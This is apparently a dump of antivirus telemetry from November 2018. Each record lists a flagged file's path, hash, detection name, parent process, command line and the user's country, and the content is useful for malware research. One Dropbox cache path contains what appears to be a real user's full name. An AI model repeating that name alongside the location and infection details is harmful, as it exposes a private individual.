  Row(detection=Row(filename='decelod.exe', filepath='C:\\Users\\X\\AppData\\Local\\{B8788E24-9CD0-E29C-F148-C774D5203BEC}\\decelod.exe', filesize=1600000, name='HEUR/AGEN.1033829.#M1.#R1'), hash='1623129501d3a77f371635e57f9f599b6a3d3d202427c7d5a95ca710d9f22f8b', metadata=Row(cmdline='--engine=2 --session-id=\\\\\\/UisE3Y5XkckYeZOUHLc5PKGoB9QRhXHjdgA0f2i --registry-suffix=ESET --extended-safebrowsing-enabled --chrome-version=70.0.3538.77 --chrome-channel=4 --srt-field-trial-group-name=NewCleanerUIExperiment', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Local\\Google\\Chrome\\User Data\\SwReporter\\35.177.200\\software_reporter_tool.exe', parentsize=12084856, timestamp='2018-11-02T03:25:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:34:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.216\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.216\\Setup.exe', parentsize=1551000, timestamp='2018-11-02T11:32:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='common.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\COMMON\\COMMON.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='245f9c9243679eb41520541d49e890f077dd70123070e3bfca94ac18cdd1fc81', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:52:45Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='1ff6b3658dc4353f8c87742731115fe6b3d46d344173043f038c1502c49d6f3a', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T02:55:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:49:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fvdxrjcm.exe', filepath='\\\\?\\F:\\RECYCLER\\S-7-4-07-3262740328-8645573582-664574467-6068\\FvdXRJcM.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='07b87ade61aa3f13cba28a0c3adb65ae54116d76148b3fc9252519fea4a8d47d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:24:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~b18e0b44.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~b18e0b44.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='2dc4a6400d1cf4303a752df45f2adee492d52cd1ce48c572f991187a1c58e2b3', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:40:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msimg32.dll', filepath='c:\\users\\X\\desktop\\setup\\msimg32.dll', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T10:30:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='33cbdd173ae056011b2b83b9bf73a10732e09c7db212fc10b50186e885798ac3', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-17\\33CBDD173AE056011B2B83B9BF73A10732E09C7DB212FC10B50186E885798AC3', filesize=320000, name='W2000M/Marker.BO.#M1.#R1'), hash='33cbdd173ae056011b2b83b9bf73a10732e09c7db212fc10b50186e885798ac3', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-17.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-18.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-19.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-20.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-16.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T05:53:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-102520-cdd5b765', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-102517-CD13CF60\\AVSCAN-20181102-102520-CDD5B765', filesize=1152000, name='HEUR/APC.#M1.#R1'), hash='3606a529040d3201d305e1624f739663c2341bb5e04965ee9c8636bf67a55c93', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\3E8859292C3CA10ADAEC120D3DB73E981CA6BB12446A4327D03BBC4E1CC7883B', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='3e8859292c3ca10adaec120d3db73e981ca6bb12446a4327d03bbc4e1cc7883b', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:46:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050752-3868add7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050752-3868ADD7', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181101-231959-7dae5fa0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_65242a8d\\AVSCAN-20181101-224153-B68E9088\\AVSCAN-20181101-231959-7DAE5FA0', filesize=1152000, name='Adware/DealPly.ypbfr.#M1.#R1'), hash='69b28945e664e80086fac1f103180f3261fb052f5d9dd42410cade338ba0bf3c', metadata=Row(cmdline=None, country='AR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:19:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160151-d6962052', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2318210b\\AVSCAN-20181102-160053-CE2EECCE\\AVSCAN-20181102-160151-D6962052', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:01:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053957-b3d1ae52', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053957-B3D1AE52', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054239-14afa124', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054239-14AFA124', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054633-9fe0b4a9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054633-9FE0B4A9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:46:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='club.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\CAM\\GTA 2010الجديده\\GTA 2010الجديده\\DATA\\MAPS\\CLUB\\CLUB.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='494844277621873581a54f2baae4fdf5bc8b3c77b85ae4b07d8c094ff7a9bed8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='p007', filepath='/var/spool/vscan/amavis/tmp/amavis-20181101T182808-00009/parts/p007', filesize=1152000, name='DR/Delphi.6abe65.#M1.#R1'), hash='6abe6528568d3820b27e309c4369b24bf0f1dc41bf8c3774d9c2526104f6a5ff', metadata=Row(cmdline=None, country='DE', os_name='Linux', os_vmajor='3', os_vminor='14', parentproc=None, parentsize=None, timestamp='2018-11-02T16:28:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053936-a78b3e58', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053936-A78B3E58', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:39:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061310-582b2448', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061310-582B2448', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:13:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp000075f2', filepath='C:\\Windows\\Temp\\tmp00000360\\tmp000075f2', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T15:50:59Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061206-31ef1d5a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061206-31EF1D5A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:12:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00000771', filepath='C:\\Windows\\Temp\\tmp00000111\\tmp00000771', filesize=8932000, name='PUA/WinThruster.EL.1.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\ITbrain\\AntiMalware\\ITbrain_AntiMalware_Service.exe', parentsize=5719344, timestamp='2018-11-02T21:45:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\6F2FAEF8F1B03F2F82F15CC0FECB49EECD17130AACC1A1BAC7AB253C531666C9', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='6f2faef8f1b03f2f82f15cc0fecb49eecd17130aacc1a1bac7ab253c531666c9', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:12:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050714-22299c79', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050714-22299C79', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055900-5cfe8acb', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055900-5CFE8ACB', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:58:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053200-97777f2d', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053200-97777F2D', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:31:58Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-050336-a0117ff0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-050336-A0117FF0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:03:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-161221-efefed4b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e150b8a2\\AVSCAN-20181102-161126-EADA5E2B\\AVSCAN-20181102-161221-EFEFED4B', filesize=8932000, name='TR/Decep.PCfighter.6547.#M1.#R1'), hash='64b46a0d05b19c1c86d8ac8257e356780ad7a327b9fc9ebd3c5db5631efc69dd', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:20:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054248-19c3986b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054248-19C3986B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054216-06b47f99', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054216-06B47F99', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:42:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120328-06ff527c', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8b7397db\\AVSCAN-20181102-115910-EAFC0947\\AVSCAN-20181102-120328-06FF527C', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='578d39ad2094181562e84cc0f0ef7a99aef1f27a5e537651d45dee406006b474', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:03:35Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-135718-e39f0a11', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_dd546174\\AVSCAN-20181102-135659-E12C82D7\\AVSCAN-20181102-135718-E39F0A11', filesize=4736000, name='TR/Agent.87443.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='CZ', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:57:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052904-2efea7a2', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052904-2EFEA7A2', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-054007-b9c14260', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-054007-B9C14260', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:40:05Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052957-4e4f19e9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052957-4E4F19E9', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-055144-594344d0', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-055144-594344D0', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:51:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061139-217faa81', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061139-217FAA81', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:37Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051353-0fad1a8f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051353-0FAD1A8F', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052748-0147996b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052748-0147996B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:27:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-053548-1fc17594', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-053548-1FC17594', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:35:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-061131-1c9b194a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-061131-1C9B194A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:11:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051052-a3c8f35b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051052-A3C8F35B', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:10:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-051324-fe878040', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-051324-FE878040', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:13:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-052417-838c8a0a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-050228-77752820\\AVSCAN-20181102-052417-838C8A0A', filesize=128000, name='TR/Injector.BGZX.#M1.#R1'), hash='740461dd3dc7217edccb50e857c070517404d45887093bab5754f16df03bcb8c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T04:24:16Z'), dt=datetime.date(2018, 11, 2)),
